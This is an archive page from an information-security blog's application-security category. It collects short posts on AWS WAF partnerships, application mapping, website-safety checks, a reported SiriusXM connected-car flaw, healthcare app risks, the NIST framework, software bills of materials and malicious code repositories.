May 15 2023

Salt Security Achieves AWS WAF Ready Designation

Category: App Security,Information Security,Web Securitydisc7 @ 9:30 am

Today, API security company Salt Security announced it is now an Amazon Web Service (AWS) Web Application Firewall (WAF) Ready Partner. This service helps customers discover Partner solutions validated by AWS Partner Network (APN) Solutions Architects that integrate with AWS WAF to accelerate adoption of an enhanced and holistic security approach. AWS WAF is available to all AWS customers and all AWS Regions and can be deployed directly from the AWS console.

This partnership differentiates Salt Security as an APN member with a product that works with AWS WAF and is generally available for AWS customers. AWS WAF Ready Partners help customers quickly identify easy-to-deploy solutions that can help detect, mitigate, and analyse some of the most common internet threats and vulnerabilities.

Today, businesses of all shapes and sizes are focused on ensuring that websites and applications are protected from external threats that can lead to a loss of revenue, loss of customer trust, and loss of brand reputation. Implementing a WAF can be a challenging task that requires deep security experience that can be expensive and hard to find in-house. AWS WAF Ready Partners offer customers a simpler solution to deploying and maintaining their application layer security solution through easy-to-deploy solutions in order to detect, mitigate, and analyze some of the most common internet threats and vulnerabilities.

Gilad Barzilay, head of business development, Salt Security said: “As an AWS Software Path Partner and member of AWS ISV Accelerate Program, Salt is proud to expand our existing relationship with AWS by becoming an AWS WAF Ready Partner. Many of our customers rely on Salt to secure their APIs on AWS. By achieving these designations, we make it easier and faster for businesses to protect the APIs running on their AWS environments. Our customers benefit from our unique cloud-scale API data lake architecture, which applies AI and ML for API discovery and threat protection.”

“Deploying the Salt platform took almost no effort,” said Jason Weitzman, senior application security engineer at Xolv Technology Solutions. “It integrated quickly with our existing Cloudflare, AWS, Jira and other systems. It also started identifying errors and delivering insights on how to craft better APIs within minutes.”

The Salt platform deploys out of band, to avoid any interference with application performance or availability. The Salt platform pairs with AWS WAF as an API traffic collection point and to block detected attackers. To support the seamless integration and deployment of solutions such as the Salt platform, AWS established the AWS Service Ready Program. The program helps customers identify solutions integrated with AWS services and spend less time evaluating new tools, and more time scaling their use of solutions that are integrated with AWS services.

APIs are a hot topic among cybersecurity professionals and C-suites at the moment due to their increasingly vital business roles. Earlier this year Salt released a new API report that showed a 400% Increase in Attackers, demonstrating the prevalence.

Security of services hosted in the Cloud with Le WAF: Web Application Firewall

 InfoSec tools | InfoSec services | InfoSec books

Tags: WAF, Web Application Firewall


Feb 09 2023

How Application Mapping Can Boost Application Security

Category: App SecurityDISC @ 10:35 am

Application security refers to the measures taken to protect the confidentiality, integrity, and availability of an application and its associated data. This involves designing, developing, and deploying applications in a secure manner and protecting them against threats such as hacking, malware, and data theft. It also involves the use of application security testing tools, as well as ongoing monitoring and management to detect and respond to security incidents. 

Application security aims to prevent unauthorized access to an application and its data, and to ensure the privacy and security of sensitive information processed by the application. This is essential for organizations to maintain the trust of their customers, partners, and stakeholders, and to comply with industry regulations and standards.

What Is Application Mapping?

Application mapping is the process of creating a visual representation of the components, relationships, and interactions of a software application. It helps to identify potential security vulnerabilities and areas of risk, and can be used to support security testing, incident response, and overall application security planning.

Application mapping can be performed manually or with the use of automated tools and typically includes a diagram that shows the various components of the application, such as the user interface, database, and server, and how they interact with each other. This information can be used to create a comprehensive understanding of the application architecture and to develop and implement effective security controls.

How Application Mapping Can Boost Application Security

Application mapping can boost application security by providing a comprehensive understanding of the application’s architecture, data flow, and interactions between components. This information can be used to identify potential security risks and vulnerabilities and to implement appropriate application security measures to mitigate these risks. Here are some specific ways that application mapping can boost application security:

  • Identification of sensitive data: By creating a visual representation of the flow of data within an application, application mapping can help to identify sensitive data and the components that handle this data. This information can be used to ensure that sensitive data is properly protected and that the appropriate security measures are in place to secure the data.
  • Improved threat modeling: Threat modeling is the process of identifying potential security risks and vulnerabilities within an application. Application mapping can provide a clear understanding of the application’s architecture, components, and data flow, making it easier to identify potential security risks and vulnerabilities.
  • Better access control: Application mapping can be used to identify the relationships between different components and to understand the flow of data within the application. This information can be used to implement better access controls, such as role-based access controls, to ensure that sensitive data is only accessible by authorized users.
  • Improved network segmentation: By creating a visual representation of the application’s architecture and data flow, application mapping can be used to identify the components that are communicating with each other and the flow of data between these components. This information can be used to improve network segmentation and to ensure that sensitive data is only accessible by authorized components.
  • Better incident response: In the event of a security incident, application mapping can provide a clear understanding of the application’s architecture and data flow, making it easier to respond to the incident and restore the application to a secure state.

Application Mapping Best Practices

Recognize All Types of Dependencies

Identifying all types of dependencies is a crucial step in the application mapping process. Dependencies between components can greatly impact the security of an application, so it is important to understand all of these relationships. There are three types of dependencies that should be recognized in application mapping:

  • Functional dependencies: These describe the relationships between components that perform specific functions. For example, a user interface component may depend on a database component to store and retrieve data. By recognizing functional dependencies, organizations can understand how changes to one component can impact the overall functionality of the application.
  • Data dependencies: These describe the relationships between components that exchange data. For example, an application component may receive data from an external source, such as a web service, and pass that data to another component for processing. By recognizing data dependencies, organizations can understand how sensitive data flows through the application and identify areas where data may be vulnerable to attack.
  • Security dependencies: These describe the relationships between security controls and the components they protect. For example, a firewall may protect an application server, or encryption may protect sensitive data in transit. By recognizing security dependencies, organizations can understand the overall security posture of the application and identify areas where security controls may be insufficient or missing.

Actively Avoid Dependencies When Possible

By reducing the number of dependencies between components, organizations can minimize the attack surface and simplify security management. Here are a few ways that dependencies can be reduced:

  • Removing unnecessary components: Unnecessary components can increase the attack surface and the complexity of security management. By removing these components, organizations can reduce the number of dependencies and simplify the application architecture.
  • Limiting access to components: Limiting access to components, such as by restricting network access or implementing access controls, can reduce the number of dependencies and minimize the attack surface. For example, by limiting access to a database component to only the components that need to access it, organizations can reduce the number of potential attack vectors.
  • Simplifying interactions between components: Complex interactions between components can increase the risk of security vulnerabilities and make it more difficult to manage security. By simplifying these interactions, organizations can reduce the number of dependencies and improve the overall security of the application.

Strive To Test Everything

Testing all components and interactions represented in the application map is essential to identify security vulnerabilities and ensure that they are addressed. Here are a few reasons why comprehensive testing is important:

  • Prioritize testing efforts: Application mapping provides a roadmap for comprehensive security testing, which can be used to prioritize testing efforts and ensure that all areas of the application are tested. This can help organizations focus their testing efforts on the most critical components and interactions.
  • Identify vulnerabilities: By testing all components and interactions, organizations can identify security vulnerabilities that may otherwise be overlooked. This can include vulnerabilities in the functionality of individual components, the interactions between components, and the security controls that protect them.
  • Address vulnerabilities before exploitation: Comprehensive testing can help organizations identify and remediate security vulnerabilities before they can be exploited. This can reduce the risk of a successful attack and improve the overall security posture of the application.
  • Ensure the security of the entire application: Testing individual components may not be enough to ensure the security of the entire application. By testing everything, organizations can understand how all components and interactions work together and identify potential security vulnerabilities in the overall architecture.

Periodically Update Your Map

Periodically updating your application map is a best practice that helps ensure the security of an application. Regularly updating the map ensures that it remains accurate and up-to-date, which is essential for effective security management. Here are a few reasons why periodic updates are important:

  • Reflect changes in the application: Applications change over time, and regular updates to the map help ensure that these changes are accurately reflected. For example, new components may be added, existing components may be updated, or relationships between components may change. Keeping the map up-to-date helps organizations understand the impact of these changes on the security of the application.
  • Identify new dependencies: As the application evolves, new dependencies may be introduced that need to be recognized and managed. By regularly updating the map, organizations can identify these new dependencies and understand how they impact the security of the application.
  • Stay ahead of threats: Threats to the security of an application are constantly changing, and regular updates to the map help organizations stay ahead of these threats. By understanding how changes in the application and new threats may impact the security of the application, organizations can take proactive steps to mitigate risk.
  • Improve security management: Periodic updates to the application map can help organizations improve the efficiency and effectiveness of security management. By keeping the map up-to-date, organizations can ensure that security efforts are focused on the right areas and that the overall security posture of the application is strong.

Conclusion

In conclusion, application mapping is a powerful tool that can significantly boost the security of applications. By creating a detailed map of the components and interactions within an application, organizations can gain a better understanding of their security posture and identify potential vulnerabilities. 

By following the best practices in this article, organizations can proactively mitigate risk and improve the efficiency and effectiveness of their security management efforts. In today’s increasingly connected and complex technological landscape, the importance of application security cannot be overstated, and application mapping can play a critical role in ensuring the security and protection of sensitive information and data.

Application Security Program Handbook: A guide for software engineers and team leaders

Application Security for Developers

Checkout out our previous posts on App Security


InfoSec Threats
 | InfoSec books | InfoSec tools | InfoSec services

Tags: Application security


Dec 23 2022

WEB APPLICATION PENTESTING CHECKLIST

Category: App Security,Pen Test,Web SecurityDISC @ 11:37 am
This image has an empty alt attribute; its file name is image-20.png

Web Pentesting Checklist Cyber Security News

PenTesting Titles

Penetration Testing: Protecting Networks and Systems

Pentesting Training

Penetration Testing – Exploitation

Penetration Testing – Post Exploitation

Infosec books | InfoSec tools | InfoSec services

Tags: WEB APPLICATION PENTESTING CHECKLIST


Dec 19 2022

Is this website Safe : How to Check Website Safety to Avoid Cyber Threats Online

Category: App Security,Cyber Threats,Web SecurityDISC @ 10:58 am

is this website safe ? In this digital world, Check website safety is most important concern since there are countless malicious websites available everywhere over the Internet, it is very difficult to find a trustworthy websiteWe need tobrowse smart and need to make sure the site is not dangerous by using Multiple approaches.

In general, it is good to type the website URL instead of copy-paste or clicking an URL. Also, check to see the website working with HTTP OR HTTPS.

Investigating: is this website safe

In order to find, is this website safe , we need to figure it out if the URL received from an unknown source and we would recommend cross-checking the URL before clicking on it. Copy the URL to analyzers that available over the Internet and ensure it’s Integrity. 

If it is a shortened URL you can unshorten itwith the siteand then analyze the actual URL.

Methods to analyze Websites

To check website safety, the first and the most recommended method is to check online page scanners, which uses the latest fingerprinting technology to show web applications are up to date or infected by malware.

Like this number of scanners available

Website reputation check needs to be done to find the trustworthiness of website with WOT .

pis

Ensure SSL is there before making a purchase

In order to check website safety, Ensure the website availability with https before entering the payment card details. We can audit the HTTPS availability with the SSL analyzer URL’s available over the internet.

Also, there is a range of certificates available over the Internet from low assured (domain validation) to the Most trusted Extended validation certificates, you can refer the URL for more details. 

Moreover, we can verify their prompt installation with various popular checkers available

Google Safe Browsing: is this website safe

According to Google, in order to check, is this website Safe, Browsing is a service that Google’s security team built to identify unsafe websites across the web and notify users and webmasters of potential harm.

In this Transparency Report, Google discloses details about the threats we detect and the warnings we show to users.

We share this information to increase awareness about unsafe websites, and we hope to encourage progress toward a safer and more secure web.

Safe Browsing also notifies webmasters when their websites are compromised by malicious actors and helps them diagnose and resolve the problem so that their visitors stay safer.

Safe Browsing protections work across Google products and power safer browsing experiences across the Internet.

Check the Browsing Website have Any unsafe Content or not –   Google Safe Browsing

To Report Malicious websites

Please report the dangerous URL to the services mentioned below. They are arranged in categories which should make it relatively easy to decide which services you should report the site to.

Services which blacklist Dangerous sites

Check the Blacklist IP Address 

There are some awesome tools to Check the website IP Address has been listed in the Global Blacklist Database.

Multirblis a free multiple DNSBL (DNS BlackList aka RBL) lookup and FCrDNS (Forward Confirmed reverse DNS aka iprev) check tool to confirm,  is this website Safe.

Check the Website Safety & Reputation

analyzes a website through multiple blacklist engines and online reputation tools to facilitate the detection of fraudulent and malicious websites. This service helps you identify websites involved in malware incidents, fraudulent activities, and phishing websites.

Important tools for Check the Website Reputation and confirm is this website Safe

Conclusion

Cyber criminals are using various sophisticated techniques to fool online users to drop malware and other cyber threats to cause unbearable damages. so beware of the malicious website, don’t blindly open the website and check the website safety before open it.

Is this website Safe : How to Check Website Safety to Avoid Cyber Threats Online

Web Application Security: Exploitation and Countermeasures for Modern Web Applications

Security Analysis with search engines:

Image preview

Tags: #Pentesters, Security Analysis, Web Application Security, Website Safety


Dec 06 2022

Bug in Toyota, Honda, and Nissan Car App Let Hackers Unlock & Start The Car Remotely

The majority of major automobile manufacturers have addressed vulnerability issues that would have given hackers access to their vehicles to perform the following activities remotely:-

  • Lock the car
  • Unlock the car
  • Start the engine
  • Press the horn
  • Flas the headlights
  • Open the trunk of certain cars made after 2012
  • Locate the car

Flaw in SiriusXM

SiriusXM, one of the most widely used connected vehicle platforms available on the market, has a critical bug in its platform that affects all major vehicle brands.

There is a particular interest among security researchers in the area of connected cars, like Yuga Labs’ Sam Curry. In fact, he’s the one who was responsible for discovering a security hole in the connected cars of major car manufacturers during his routine research.

There are a number of car manufacturers who use Sirius XM telematics and infotainment systems as a part of their vehicle technology.

Affected Car Brands

Here below we have mentioned the brands’ names that are affected due to this critical bug in SiriusXM:-

  • Acura
  • BMW
  • Honda
  • Hyundai
  • Infiniti
  • Jaguar
  • Land Rover
  • Lexus
  • Nissan
  • Subaru
  • Toyota

Vulnerability Analysis

During the process of analyzing the data, it was found that there is a domain (http://telematics(.)net) that is used during the vehicle enrollment process for the remote management of Sirius XM.

The flaw is associated with the enrollment process for SiriusXM’s remote management functionality which results in the vehicle being tampered with.

There is not yet any technical information available about the findings of the researchers at the present time, since they haven’t shared anything in detail.

Upon further analysis of the domain, it becomes apparent that the Nissan Car Connected App is one of the most plentiful and frequently referenced apps in this domain.

In order for the data exchanged through the telematics platform to be authorized, the vehicle identification number (VIN) only needs to be used. The VIN of the vehicle can therefore be used to carry out a variety of commands by anyone who knows the number.

The next step would be to log in to the application later on, and then the experts examined the HTTPS traffic that came from a Nissan car owner.

Researchers discovered one HTTP request during the scan in which they conducted a deep analysis. 

It is possible to obtain a bearer token return and a “200 OK” response by passing a VPN prefixed ID through as a customerID in the following way:-

Car App

Using the Authorization bearer in an HTTP request, researchers attempted to obtain information about the user profile of the victim and, as a result, they successfully retrieved the following information:-

  • Name
  • Phone number
  • Address
  • Car details

In addition to this, the API calls used by SiriusXM for its telematics services worked even if the user did not have an active subscription with SiriusXM.

As long as the developers or owners are not involved in the process of securing a vulnerable app, it is impossible to guarantee the security of that app. This is why they should be the only ones who can issue security updates and patches.

Recommendations

Here below we have mentioned the recommendations made by the security analysts:-

  • Ensure that you do not share the VIN number of your car with unreliable third parties.
  • In order to protect your vehicle from thieves, it is imperative to use unique passwords for each app connected to the vehicle.
  • Keep your passwords up-to-date by changing them on a regular basis.
  • Keeping your system up-to-date should be a priority for users.

The Car Hacker’s Handbook: A Guide for the Penetration Tester

Tags: Car Security


Nov 21 2022

How to improve secure coding education

Category: App SecurityDISC @ 2:53 pm

Did you know that not one of the top 50 undergraduate computer science programs in the U.S. requires a course in code or application security for majors? Yet the threatscape is only expanding.

A recent report by Security Journey reveals the gap left by academia when developers are being trained to write code, and the ways in which the current state of security awareness can evolve into continuous, programmatic, and more effective education. Other key suggestions from the discussion include:

  • Investment should be driven down from the top of organizations
  • Training must be relevant to each professional
  • Collaboration between industry and academia is needed

In this Help Net Security video, Jason Hong, Professor at Carnegie Mellon University, discusses the steps both industry and academia can take to improve application security knowledge and secure coding education.

Building Secure and Reliable Systems

Tags: Building Secure and Reliable Systems, secure coding education


Nov 07 2022

Top 7 Methods to Minimize Application Threat Risks in Healthcare

Category: App SecurityDISC @ 1:27 pm

Healthcare organizations are increasingly using apps for telehealth and beyond. These apps have a significant impact on how they operate. They also have access to lots of sensitive information, such as EMR.

As a result, we have seen an uptick in healthcare application threats globally. The top threat risks in healthcare industry includes ransomware, DDoS and automated attacks. 

Healthcare data breaches are the costliest across the globe. They cost healthcare organizations USD 9.23 million on average. The figure is more than twice the pan-industry average of USD 4.24 million.  Managing AppSec risks is crucial to healthcare organizations.

How to Reduce Risks of Healthcare Application Threats? 

  • Ongoing Risk Assessments 

This is the first, most critical step in risk management in healthcare. It lays the foundation for a robust AppSec program. Risk assessments help you identify, analyze and rank your apps’ risks. 

Risk assessments involve the following: 

  • Identifying app vulnerabilities
  • Evaluating the exploitability of each vulnerability
  • Identifying application threats 
  • Analysing attack probability 
  • Analysing the potential impact of application threats on mission-critical assets 
  • Allocating resources based on the criticality of risks 
  • Defining ways to keep risks within tolerance levels

This way, you can ensure your mission-critical assets are always available and secure. 

Compliance frameworks like HIPAA mandate that these assessments be done once a year. But that isn’t enough. You need to keep assessing and managing risks regularly. Only then can you harden your app security posture. 

  •  Establish and Update Security Policies 

Clearly defined app security policies are critical to averting application threat risks. These policies should incorporate security, industry, legal and regulatory best practices. The AppSec policies should define security strategies, processes, tools, and procedures. They should define the following: 

  • Incident response and disaster recovery plans
  • Role-based, strict access controls
  • Zero trust authentication and password policies 
  • Backup and storage 
  • Data privacy and security policies 

AppSec should define processes for users to report suspicious activities. AppSec policies should include proper communication plans too.

Further, you must regularly update these security policies. The policies should reflect the latest best practices and the latest risk posture. 

  •  Identify and Secure Threat Entry Points 

How do application threats become successful attacks? Attackers keep looking for exploitable entry points. These entry points are vulnerabilities, misconfigurations, and security gaps. They exploit entry points that aren’t secure when they find them. They can then 

  • Introduce malware
  • Create backdoors
  • Steal data
  • Make services unavailable to patients/ employees 

So, you need to be proactive in finding and securing entry points. And do so before attackers find them. To this end, you must put in place a vulnerability management program. 

Inventory all your healthcare app-related assets. This process should be automated. It should automatically identify all endpoints, APIs, components, third-party services, etc. Make sure to include all assets for crawling by your scanning and next-gen WAF tools. 

Deploy an automated scanner to keep identifying known flaws. This way, you can prevent the inaccuracies and inefficiencies of manual scanning. Perform pen-testing and security audits regularly to identify 

  • Unknown vulnerabilities
  • Logical flaws 
  • Zero-day application threats
  • Understand the exploitability of flaws
  • Strength of security defenses 

You can rank these flaws based on the level of risks involved. Then, you can remediate through permanent fixes or instant virtual patching. Leverage fully managed security solutions to manage your vulnerabilities better.

  • Centralized Visibility into Security Posture 

You must have real-time visibility into your app security posture. This will help you take immediate action to prevent application threats. 

  • Ensure Your Vendors Prioritize Security 

You may use several third-party apps, APIs, and services. It is key that you carefully vet vendors before onboarding services. Why? Your apps will be at risk if they don’t take security seriously. Make sure they take steps to monitor and avert application threats.  

You must also ensure vendors are compliant. To this end, you should keep monitoring and auditing them. 

  • Keep Educating All Users 

Human errors are top vulnerabilities enabling cyber attacks in healthcare. That is why continuous education of all users is a must. Users include patients/ customers, employees, and partners who use your apps. 

All users must know the app security dos and don’ts. They should know what to click and what not to. They must be able to make smart decisions. They must know whom to report to or what action to take when observing unusual activities. 

  • Invest in Reliable Security Solutions 

Invest in reliable, fully managed security solutions like AppTrana. AppTrana includes comprehensive security solutions backed by industry expertise in managing your healthcare security risks. 

The Way Forward Cyber-attacks on healthcare are becoming more lethal, complex, and severe. Take proactive action to minimize your application threat risk.

Threat Risks in Healthcare

Application Security Program Handbook: A guide for software engineers and team leaders

Tags: Application Threat


Oct 04 2022

How cybersecurity frameworks apply to web application security

Category: App SecurityDISC @ 2:26 pm

A cybersecurity framework provides a formal and comprehensive set of guidelines to help organizations define their security policies, assess cybersecurity posture, and improve resilience. Cybersecurity frameworks specify security controls, risk assessment methods, and suitable safeguards to protect information systems and data from cyberthreats. Though originally developed for government agencies and other large organizations, cybersecurity frameworks can also be a useful source of security best practices for medium and small businesses. Without getting too formal, let’s see what cybersecurity frameworks exist, why you may want to use one, and how to hand-pick the cybersecurity processes and actions that apply to your specific web application security program.

Why cybersecurity frameworks exist

Depending on the organization, a successful cyberattack can have serious social, economic, or even political consequences. Whether they result in a denial of service, a data breach, or a stealthy and persistent presence in targeted systems, cyberattacks are now a permanent concern not only for business and government but even for military operations. Well-defined cybersecurity programs are vital for organizations of all sizes, but simply saying “secure everything” isn’t good enough, especially given the complexity of today’s interconnected information systems and supply chains. And with data security and privacy high on the agenda, a systematic and formalized approach is necessary to identify specific security controls that keep sensitive information inaccessible to malicious actors.

With public and private organizations of all sizes facing similar cybersecurity events and challenges, it became clear that a common cybersecurity framework would benefit everyone. By working to a common set of best-practice policies and recommendations, everyone would be able to define their own cybersecurity practices and protective technologies while maintaining a common baseline for auditing and certification. And for organizations that may lack the resources or technical resources to design their own policies from scratch, having such a starter policy kit could be the only way to come up with a reasonably complete and effective cybersecurity policy.

Commonly used cybersecurity frameworks

You can think of a cybersecurity framework as a common box of parts for building cybersecurity policies. More formally, a cybersecurity framework can be any document that defines procedures and goals to guide more detailed policies. Existing documents that contain such cybersecurity guidelines include:

  • The NIST Cybersecurity Framework: The most widely used document for cybersecurity policy and planning, developed by the National Institute of Standards and Technology.
  • ISO 27001 Information Security Management: Guidelines for information security management systems (ISMS) prepared by the International Organization for Standardization.
  • CIS Critical Security Controls for Effective Cyber Defense: A framework of actions to protect organizations from known cyberthreats, prepared by the Center for Internet Security.
  • Risk management frameworks: Documents such as NIST’s Risk Management Framework (NIST SP 800-37 Rev. 2) and the ISO 27005:2018 standard for Information Security Risk Management focus on risk management strategies, including cybersecurity risk management.
  • Industry-specific frameworks: Many industries have their own security standards for these sectors, such as PCI DSS for electronic payment processing, HIPAA rules for healthcare, or COBIT for IT management and governance.

A closer look at the NIST cybersecurity framework

In 2013, a US presidential executive order was issued calling for a standardized cybersecurity framework to describe and structure activities and methodologies related to cybersecurity. In response to this, NIST developed its Framework for Improving Critical Infrastructure Cybersecurity, commonly called the NIST Cybersecurity Framework (NIST CSF). It is a detailed policy document created not only to help organizations manage and reduce their cybersecurity risk but also to create a common language for communicating about cybersecurity activities. While the framework was initially intended only for companies managing critical infrastructure services in the US private sector, it is now widely used by public and private organizations of all sizes.

The NIST CSF is divided into three main components:

  • Framework core: The main informational part of the document, defining common activities and outcomes related to cybersecurity. All the core information is organized into functions, categories, and subcategories.
  • Framework profile: A subset of core categories and subcategories that a specific organization has chosen to apply based on its needs and risk assessments.
  • Implementation tiers: A set of policy implementation levels, intended to help organizations in defining and communicating their approach and the identified level of risk for their specific business environment.

The framework core provides a unified structure of cybersecurity management processes, with the five main functions being IdentifyProtectDetectRespond, and Recover. For each function, multiple categories and subcategories are then defined. This is where organizations can pick and mix to put together a set of items for each function that corresponds to their individual risks, requirements, and expected outcomes. For clarity and brevity, each function and category has a unique letter identifier, so for example Asset Management within the Identify function is denoted as ID.AM, while Response Planning within the Response function is RS.RP

Each category includes subcategories that correspond to specific activities, and these subcategories get numerical identifiers. To give another example, subcategory Detection processes are tested under the Detection Processes category and Detect function is identified as DE.DP-3. Subcategory definitions are accompanied by references to the relevant sections of standards documents for quick access to the normative guidelines for each action.

NIST cybersecurity framework

Applying the NIST framework to application security

By design, the NIST CSF has an extremely broad scope and covers far more activities than any specific organization is likely to need. To apply the framework to web application security, you start by analyzing each of the five functions as they relate to your existing and planned application security activities and risk management processes. Then, you select the categories and subcategories relevant to your specific needs and use them as the backbone of your own security policy to ensure you cover all the risks and activities you need. For general web application security, a skeleton cybersecurity policy would need to include at least the following subcategories for each function:

Identify:

  • ID.AM-2: Software platforms and applications within the organization are inventoried
  • ID.RA-1: Asset vulnerabilities are identified and documented

Protect:

  • PR.AC-4: Access permissions and authorizations are managed, incorporating the principles of least privilege and separation of duties
  • PR.DS-2: Data-in-transit is protected
  • PR.IP-10: Incident response and recovery plans are tested

Detect:

  • DE.AE-2: Detected events are analyzed to understand attack targets and methods
  • DE.CM-8: Vulnerability scans are performed

Respond:

  • RS.RP-1: Response plan is executed during or after an incident
  • RS.AN-1: Notifications from detection systems are investigated

Recover:

  • RC.RP-1: Recovery plan is executed during or after a cybersecurity incident
  • RC.CO-3: Recovery activities are communicated to internal and external stakeholders as well as executive and management teams

IBM Application Security for Developers (Free)

Learn to identify security vulnerabilities in applications and implement secure code practices to prevent events like data breaches and leaks. Become familiar with DevSecOps practices, and SAST for identifying security flaws.

Web Application Security: Exploitation and Countermeasures for Modern Web Applications

Tags: Countermeasures for Modern Web Applications, Web Application Security


Aug 30 2022

Don’t Let ‘Perfect’ Be the Enemy of a Good AppSec Program

Category: App SecurityDISC @ 2:43 pm

These five suggestions provide a great place to start building a scalable and affordable program for creating secure apps.

go for good enough reminder note with a cup of coffee and a silver pen
Source: Marek Uliasz via Alamy Stock Photo

Some security programs need to have the absolute highest possible level of security assurance for the systems and the data they protect. They need to be as close to perfect as they can be. Examples of this would be managing evidence for top secret counterterrorism activities, invaluable intellectual property such as the first COVID-19 vaccine, or systems that require uptimes of five 9s (99.999%) or higher, for which downtime of a single minute can cost millions of dollars.

That said, for most companies, a “good” application security (AppSec) program will suffice. A good program is one where your applications are safe against the most common types of attacks but could still fall to a determined, well-funded, and advanced attacker. Let’s discuss the differences, and how to create something that meets your company’s needs.

Elections Require Perfection

For a “perfect” AppSec program, every single potential vulnerability reported by any test must be investigated by a security expert. This means running static application security testing (SAST), dynamic application security testing (DAST), and other automated tools with the confidence level for findings set to report “any and all” possibilities. That requires hiring one or more security experts who are trained to run down each item and given weeks to check each application. It also means hiring several security professionals to do manual security testing and code review, for multiple viewpoints, and to re-test that the bugs are truly fixed and have not created new bugs in the process. It is both time-consuming and quite expensive.

A few years ago, I worked on an application that had to run on a 32-kilobit modem in the Arctic. It makes our elections in Canada happen, which meant it had to be absolutely perfect. We hired several different security professionals, who used a multitude of tools and manual techniques to find both security and non-security issues within our application. We did stress testing, performance testing, integration testing, and so much more. We set up a functional returning office (the place that you vote), with every system fully functional, and ran an entire 36-day mock election, with fake security incidents thrown into the mix, 6 months before the big day. We spent the following 6 months finalizing every detail. It’s unlikely you would have noticed, as when the 52nd General Election happened on Oct. 19, 2015, it went off without a hitch.

They don’t write news articles when everything goes right. We also put in quite a bit more work than what I shared above, which I am not at liberty to share. The point is that being perfect is not cheap, and it is not quick.

5 Ways to Make Good ‘Good Enough’

With that story in mind, does your organization need to be truly perfect? Or is “good” good enough? Let’s look at some ways your organization could create a scalable and affordable application security program that is good.

1. Automate. First off, leverage automation whenever possible. There are many free and paid security tools that can provide good results. When I say good, I mean most of the results they report are true positives, and the false negatives (missed bugs) are at a level your organization can be comfortable with. Some automated tools will allow you to set a confidence level for your results; starting with a confidence level of “high” in the first year of your program, and then shifting to “medium” in the second year, is a good way to get software developers to have faith in what you are reporting while not overwhelming them.

2. Use anti-pattern matching SAST. For SAST tools, when you’re aiming for “good” results, select a next-generation SAST that performs anti-pattern matching (regex looking for known-bad patterns) rather than an original SAST type that performs symbolic execution (running down every possible code outcome, searching for potential flaws and bugs). While the original types of SAST are ideal for creating a perfect application, next-generation SASTs are faster, provide more true positives, and are sometimes quite a bit cheaper as well.

3. Spell out technical requirements. When starting new projects, give your project team a list of expectations, both for technical security requirements and for activities you expect them to participate in as part of the project life cycle. You could create a list once for each type of technology (Web apps, APIs, serverless, infrastructure as code, containers, etc.), then reuse that list for every new project it applies to. This also allows a project manager to schedule time for the security activities to happen so that project teams don’t face unexpected overtime.

4. Run a threat model. During the design phase, reserve one hour with the product owner, the technical leader of the project, and a member of the AppSec team. Perform a simple threat model on your application and implement some of the recommendations from that session.

5. Train people on secure coding. Give your software developers secure coding training. There’s several free or almost-free courses on the Internet for this now, and every bug they help your people avoid creating saves you more time and money than you may realize.

Although this is just a short list of ways to build a scalable and affordable program for creating secure apps, these five suggestions provide a great place to start from or to add to an already existing program to make “good” software.

https://www.darkreading.com/edge-articles/don-t-let-perfect-be-the-enemy-of-a-good-appsec-program

Secure Application Development

Tags: App security by design


Aug 15 2022

How to manage the intersection of Java, security and DevOps at a low complexity cost

Category: App SecurityDISC @ 8:44 am

In this Help Net Security video above, Erik Costlow, Senior Director of Product Management at Azul, talks about Java centric vulnerabilities and the headache they have become for developers everywhere.

He touches on the need for putting security back into DevOps and how developers can better navigate vulnerabilities that are taking up all of their efforts and keeping them from being able to focus on the task at hand.

Java

Microservices Security in Action: Design secure network and API endpoint security for Microservices applications, with examples using Java, Kubernetes, and Istio

Tags: DevOps, Java Security


Aug 05 2022

Software Bill of Material and Vulnerability Management Blind Spots

Category: App Security,Security vulnerabilitiesDISC @ 9:29 am

Software Bill of Material and Vulnerability Management Blind Spots

Open source software is everywhere (which is not a bad thing in itself). However, many buyers don’t have inventory of open source components included in software products they are buying. Business even fail in keeping tack of open source components used in internally developed applications. As a result, vulnerability management programs have blind spots.

Take an inventory of open source software (standalone and libraries) and make it part of your vulnerability management program.

Why it matters:

  1. Use of open source software is not bad in itself. Everyone uses open source software. The biggest examples are Linux and Apache server.
  2. Many commercial software vendors use open source components but don’t properly and adequately disclose all open source components included in the commercial products.
  3. Recent vulnerabilities (e.g. log4j) have far reaching impact.
  4. Software applications developed in-house also include open source components. As these applications age and the initial developers move on to new jobs, older and vulnerable open source components may still stay in the applications unnoticed for long time.

What to do:

  1. It is crucial to have an up-to-date inventory of all open source software, whether used as standalone products or embedded as a library inside a product. We can’t manage if we don’t know its existence.
  2. Require your software vendors to provide you with a list of all open source libraries and their versions embedded into their products.
  3. Make this list part of the vulnerability management program. Monitor release of new vulnerabilities and patches for your inventory of open source software components.

When building a bill of material for open source components, it is imperative to not only contact your software vendors but also review all software applications developed in-house. In some cases you may use source code scanning tools to build inventory of these components.

A Guide to Open-Source Software Security Risks & Best Practices

Implementing Enterprise Cybersecurity with Opensource Software and Standard Architecture

Tags: Open source security, Opensource Software


Aug 04 2022

GitHub blighted by “researcher” who created thousands of malicious projects

Category: App Security,MalwareDISC @ 10:46 am

Just over a year ago, we wrote about a “cybersecurity researcher” who posted almost 4000 pointlessly poisoned Python packages to the popular repository PyPI.

This person went by the curious nickname of Remind Supply Chain Risks, and the packages had project names that were generally similar to well-known projects, presumably in the hope that some of them would get installed by mistake, thanks to users using slightly incorrect search terms or making minor typing mistakes when typing in PyPI URLs.

These pointless packages weren’t overtly malicious, but they did call home to a server hosted in Japan, presumably so that the perpetrator could collect statistics on this “experiment” and write it up while pretending it counted as science.

A month after that, we wrote about a PhD student (who should have known better) and their supervisor (who is apparently an Assistant Professor of Computer Science at a US university, and very definitely should have known better) who went out of their way to introduce numerous apparently legitimate but not-strictly-needed patches into the Linux kernel.

They called these patches hypocrite commits, and the idea was to show that two peculiar patches submitted at different times could, in theory, be combined later on to introduce a security hole, effectively each contributing a sort of “half-vulnerability” that wouldn’t be spotted as a bug on its own.

As you can imagine, the Linux kernel team did not take kindly to being experimented on in this way without permission, not least because they were faced with cleaning up the mess:

Please stop submitting known-invalid patches. Your professor is playing around with the review process in order to achieve a paper in some strange and bizarre way. This is not ok, it is wasting our time, and we will have to report this, AGAIN, to your university…

GitHub splattered with hostile code

Accelerate DevOps with GitHub: Enhance Software Delivery Performance with GitHub Issues, Projects, Actions, and Advanced Security

Tags: DevOps, DevSecOps, malicious projects


Jul 27 2022

DUCKTAIL operation targets Facebook’s Business and Ad accounts

Category: Access Control,App Security,AuthenticationDISC @ 8:29 am

